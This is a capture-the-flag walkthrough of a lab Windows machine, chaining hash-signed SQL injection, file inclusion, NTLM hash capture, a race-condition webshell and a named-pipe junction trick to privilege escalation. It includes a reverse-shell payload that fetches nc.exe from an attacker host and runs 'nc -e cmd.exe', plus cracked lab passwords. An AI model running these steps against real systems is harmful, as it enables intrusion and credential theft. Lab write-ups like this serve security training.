Basic information

Port scanning

Only port 80 is open:

$ nmap -sC -sV -Pn 10.10.10.231

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 14:23 CST
Nmap scan report for 10.10.10.231
Host is up (0.069s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: OS Tidy Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.70 seconds

Directory scanning

Directory scanning finds /licenses:

gobuster dir -u http://10.10.10.231/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x asp,html,txt -t 50

/Index.html (Status: 200) [Size: 14257]
/assets (Status: 301) [Size: 150] [--> http://10.10.10.231/assets/]
/index.html (Status: 200) [Size: 14257]
/index.html (Status: 200) [Size: 14257]
/licenses (Status: 301) [Size: 152] [--> http://10.10.10.231/licenses/]

It requires a login:

Information

The page source gives away some information, probably usernames:

There is also an AJAX endpoint; when a parameter is missing, the error output contains a comment that leaks the salt:

http://10.10.10.231/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b

define('SECURE_PARAM_SALT','hie0shah6ooNoim');

Hashing algorithm

h is presumably a signature over the order parameter. We have the plaintext parameter and the salt, but not the hash construction, so a bit more analysis is needed:

# Different encodings of the order parameter, used as the wordlist
id+desc
id%20desc
id desc

# john's salted-MD5 subformats
john --list=subformats | grep md5
...
Format = dynamic_1 type = dynamic_1: md5($p.$s) (joomla)
...
Format = dynamic_4 type = dynamic_4: md5($s.$p) (OSC)
...
# These formats expect the salted hash written as
<hash>$<salt>

# hash file
a1b30d31d344a5a4e41e8496ccbdd26b$hie0shah6ooNoim

A quick run of john over those candidates reveals the construction and the parameter form: h is MD5 over the salt followed by the parameter value (md5($s.$p)):

sqlmap

With that, we can let sqlmap inject into order and have --eval recompute h for every payload it sends:

sqlmap -u "http://10.10.10.231/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b" --eval="import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()" --batch --threads=10

available databases [3]:
[*] cleaner
[*] information_schema
[*] test

sqlmap -u "http://10.10.10.231/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b" --eval="import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()" --batch --threads=10 -D cleaner -T licenses -C customer_id,id,license,product_id --dump

sqlmap -u "http://10.10.10.231/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b" --eval="import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()" --batch --threads=10 -D cleaner -T customers -C id,login,password --dump

vikki.solomon@throwaway.mail
7c6a180b36896a0a8c02787eeafb0e4c
password1
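The following is an added example, not code from the original write-up: a small Python script that does what the john experiment above does (try each salted-MD5 construction against each encoding of the parameter) and then provides the signing helper that sqlmap's --eval reproduces, so any injected value of order can be given a valid h. The salt, the observed hash and the URL are taken from the page; the scheme names mirror john's dynamic_* formats, and the candidate list is an assumption about which constructions are worth trying.

```python
import hashlib
import urllib.parse

# Values from the page: the salt leaked in the error comment and the h
# observed on the products-ajax.php request.
SALT = "hie0shah6ooNoim"
OBSERVED_HASH = "a1b30d31d344a5a4e41e8496ccbdd26b"
OBSERVED_PARAM = "id+desc"  # exactly as it appears in the URL
BASE_URL = "http://10.10.10.231/products-ajax.php"


def _md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


# Candidate constructions, named after john's dynamic_* subformats
# (assumed list; extend if none of them matches).
SCHEMES = {
    "md5($s.$p)": lambda s, p: _md5(s + p),
    "md5($p.$s)": lambda s, p: _md5(p + s),
    "md5($p)": lambda s, p: _md5(p),
    "md5($s.md5($p))": lambda s, p: _md5(s + _md5(p)),
}


def param_variants(raw: str) -> list:
    """Plausible forms of a URL parameter: as written, URL-decoded, percent-encoded."""
    decoded = urllib.parse.unquote_plus(raw)
    return list(dict.fromkeys([raw, decoded, urllib.parse.quote(decoded)]))


def find_scheme(target: str, salt: str, raw_param: str):
    """Return (scheme name, parameter form) that reproduces target, or None."""
    for name, fn in SCHEMES.items():
        for variant in param_variants(raw_param):
            if fn(salt, variant) == target:
                return name, variant
    return None


def sign(value: str, salt: str = SALT) -> str:
    """h for an arbitrary parameter value under the construction the page settles on, md5($s.$p)."""
    return _md5(salt + value)


def signed_url(base: str, name: str, value: str, salt: str = SALT) -> str:
    """Build a request whose h is valid for an arbitrary (for instance injected) value of `name`.
    This is what sqlmap's --eval does per request."""
    query = urllib.parse.urlencode({name: value, "h": sign(value, salt)})
    return f"{base}?{query}"


if __name__ == "__main__":
    print("matched:", find_scheme(OBSERVED_HASH, SALT, OBSERVED_PARAM))
    # Constructed payload: a second ORDER BY term is the usual first probe.
    print(signed_url(BASE_URL, "order", "id desc,(select 1)"))
```

Run against the page's hash and salt it reports which construction and which form of the parameter matched; note that the decoded form ("id desc") and the encoded form ("id+desc") hash differently, which is why the wordlist above lists all three spellings.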

Licensing Portal

Any of the recovered accounts logs into the portal:

The source again shows an endpoint with the same parameter-plus-h format:

LFI

theme is presumably passed to include, so set it to .. and recompute h accordingly; the resulting error confirms the include:

theme = ".."
import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+theme).encode('utf-8')).hexdigest()
c5427f8e0865273f4a62c614adec0985

RFI

theme = "http://10.10.14.3:7777"
import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+theme).encode('utf-8')).hexdigest()
6689491e9ca82644f7d54bec3a39f4ba

SMB

Pointing theme at a UNC path and running smbserver with -smb2support, we capture the web user's NetNTLMv2 hash when the server authenticates to our share:

theme = "//10.10.14.3/miao"
import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+theme).encode('utf-8')).hexdigest()
411d5bd4bc64f686ca745ac4e2587125

sudo python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao .

Hash cracking

Cracking it gives the web user's password:

➜  Desktop sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
charlotte123! (web)
1g 0:00:00:00 DONE (2021-05-07 08:20) 1.098g/s 1089Kp/s 1089Kc/s 1089KC/s cheers4$..chaqueto
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Race condition

webshell

With the cracked credentials we can serve an SMB share that accepts the web user's authentication. Writing a shell straight into header.inc gets a 403, because the server runs a strpos check on the file content before including it. But the check and the include read the file separately, so we can race it: keep rewriting the file so that the strpos check sees harmless text and the include that follows reads the webshell:

sudo python3 ~/Tools/impacket/examples/smbserver.py -username web -password 'charlotte123!' -ip 10.10.14.3 -smb2support miao .

./race.sh "<?php phpinfo(); ?>"

reverse shell

Download nc and get a reverse shell:

./race.sh '<?php system("cmd /c powershell iwr http://10.10.14.3:7777/nc.exe -outf \windows\system32\spool\drivers\color\cute.exe"); ?>'
./race.sh '<?php system("cmd /c start \windows\system32\spool\drivers\color\cute.exe 10.10.14.3 4444 -e cmd.exe"); ?>'

race.sh

#!/bin/bash
# Keep flipping header.inc on the SMB share between harmless text (which
# passes the strpos check) and the payload (which we want include() to read).
PAYLOAD=$1
while :; do
echo hello world > /Users/miao/Downloads/temp/header.inc
echo "$PAYLOAD" > /Users/miao/Downloads/temp/header.inc
done
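To make the time-of-check/time-of-use window concrete, here is an added Python model of the server-side bug that race.sh exploits; it is not code from the write-up or from the target's PHP. The "server" is a function that reads the file once for the strpos check and once more for the include; the hardened variant reads once and checks the same bytes it includes. race() runs a local writer thread that flips a temp file exactly as race.sh does, so the file name, payload and thread layout are all constructed for the example.

```python
import os
import tempfile
import threading

PHP_TAG = "<?php"
BENIGN = "hello world\n"


def vulnerable_include(read):
    """Model of the server: one read for the strpos() check, a second read for include().
    Returns the content that would be included, or None for a 403."""
    if PHP_TAG in read():
        return None
    return read()  # whatever is on disk *now*, not what was checked


def hardened_include(read):
    """Read once; check and include the same bytes."""
    data = read()
    if PHP_TAG in data:
        return None
    return data


def make_sequenced_reader(*contents):
    """Deterministic reader: returns the given contents on successive calls."""
    it = iter(contents)
    return lambda: next(it)


def file_reader(path):
    def read():
        with open(path) as f:
            return f.read()
    return read


def race(include, payload, rounds=2000):
    """Local model of race.sh: a writer thread keeps flipping the file between
    BENIGN and payload while `include` is called repeatedly.
    Returns how many calls ended up including the payload."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "header.inc")
        with open(path, "w") as f:
            f.write(BENIGN)
        stop = threading.Event()

        def writer():
            while not stop.is_set():
                for data in (BENIGN, payload):
                    with open(path, "w") as f:
                        f.write(data)

        t = threading.Thread(target=writer)
        t.start()
        read = file_reader(path)
        wins = sum(1 for _ in range(rounds) if include(read) == payload)
        stop.set()
        t.join()
        return wins


if __name__ == "__main__":
    shell = "<?php phpinfo(); ?>"
    print("vulnerable wins:", race(vulnerable_include, shell))
    print("hardened wins:", race(hardened_include, shell))
```

The sequenced reader shows the bug with no timing involved: if the first read returns harmless text and the second returns the payload, the vulnerable function includes the payload while the hardened one includes what it checked. The file-based race is timing-dependent, so the number of wins varies from run to run, but the hardened version never includes the payload.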

user flag

user.txt is in the web user's Desktop directory:

Privilege escalation enumeration

We find a Cleanup service with two executables; download them for analysis:

Analysis shows the server listens on the named pipe cleanupPipe and accepts a CLEAN command: the given file's name is base64-encoded, its content is encrypted with AES-GCM, and the result is stored in the Cleanup directory.

RESTORE decrypts the file and writes it back to its original location.

So we can create a junction to C:\Users\Administrator\Desktop and CLEAN a path through it, so that root.txt is read. Before RESTORE we delete the junction and create a real directory with the same name; the file is then restored into that directory, which we control.

root flag

The whole flow is roughly as follows and yields root.txt:

:: junction from a directory we control to the Administrator desktop
mklink /j miao \users\administrator\desktop

:: CLEAN reads the file through the junction (as the service's account) into \programdata\cleanup
echo CLEAN \users\web\downloads\miao\root.txtx > \\.\pipe\cleanupPipe

dir \programdata\cleanup
:: swap the junction for a real directory of the same name
rmdir miao
mkdir miao

:: RESTORE writes the file back to the same path, which now lands in our directory
echo RESTORE \users\web\downloads\miao\root.txtx > \\.\pipe\cleanupPipe
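The following is an added example, not the Cleanup service's code nor anything from the write-up: a Python model of the CLEAN/RESTORE path handling that reproduces the junction swap above in a temporary directory and shows the check that would have stopped it. A POSIX directory symlink stands in for the mklink /J junction (an assumption; on Windows os.symlink needs the right privilege and a junction is not exactly a symlink), the AES-GCM step is omitted because only path resolution matters here, and all file names and the flag content are constructed.

```python
import base64
import os
import tempfile


class CleanupService:
    """Model of the service: CLEAN copies a file into `store` under a base64
    name; RESTORE writes it back to the path it was given.
    With hardened=True, RESTORE refuses if the path no longer resolves to the
    location the file was actually read from at CLEAN time."""

    def __init__(self, store, hardened=False):
        self.store = store
        self.hardened = hardened
        self.resolved = {}  # stored name -> real location seen at CLEAN time

    def _key(self, path):
        return base64.urlsafe_b64encode(path.encode()).decode()

    def clean(self, path):
        key = self._key(path)
        with open(path, "rb") as src, open(os.path.join(self.store, key), "wb") as dst:
            dst.write(src.read())  # real service: AES-GCM; omitted here
        self.resolved[key] = os.path.realpath(path)

    def restore(self, path):
        key = self._key(path)
        if self.hardened and os.path.realpath(path) != self.resolved.get(key):
            return False  # path was swapped underneath us (junction -> real dir)
        with open(os.path.join(self.store, key), "rb") as src, open(path, "wb") as dst:
            dst.write(src.read())
        return True


def remove_link(link):
    # A directory symlink is unlinked on POSIX; a junction is removed with rmdir on Windows.
    os.rmdir(link) if os.name == "nt" else os.unlink(link)


def junction_swap(hardened):
    """Replay the attack: CLEAN through a link into Administrator\\Desktop, swap the
    link for a real directory, RESTORE. Returns (restore accepted, content we ended up with)."""
    with tempfile.TemporaryDirectory() as d:
        admin = os.path.join(d, "Administrator", "Desktop")
        web = os.path.join(d, "web", "downloads")
        store = os.path.join(d, "Cleanup")
        for p in (admin, web, store):
            os.makedirs(p)
        with open(os.path.join(admin, "root.txt"), "w") as f:
            f.write("flag{constructed}\n")  # constructed stand-in for root.txt

        link = os.path.join(web, "miao")
        os.symlink(admin, link, target_is_directory=True)  # mklink /j miao \users\administrator\desktop
        target = os.path.join(link, "root.txt")

        svc = CleanupService(store, hardened)
        svc.clean(target)          # service reads root.txt through the link
        remove_link(link)          # rmdir miao
        os.mkdir(link)             # mkdir miao
        accepted = svc.restore(target)

        copy = os.path.join(link, "root.txt")
        return accepted, os.path.exists(copy) and open(copy).read()


if __name__ == "__main__":
    print("vulnerable:", junction_swap(hardened=False))
    print("hardened:  ", junction_swap(hardened=True))
```

The vulnerable service restores the file into the attacker's directory because it trusts the path string it was handed; the hardened one re-resolves the path at RESTORE time and notices it no longer points into the Administrator desktop. In a real service the better fix is to impersonate the calling user for the file operations so the junction buys nothing, but the realpath comparison is enough to illustrate the class of bug.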

References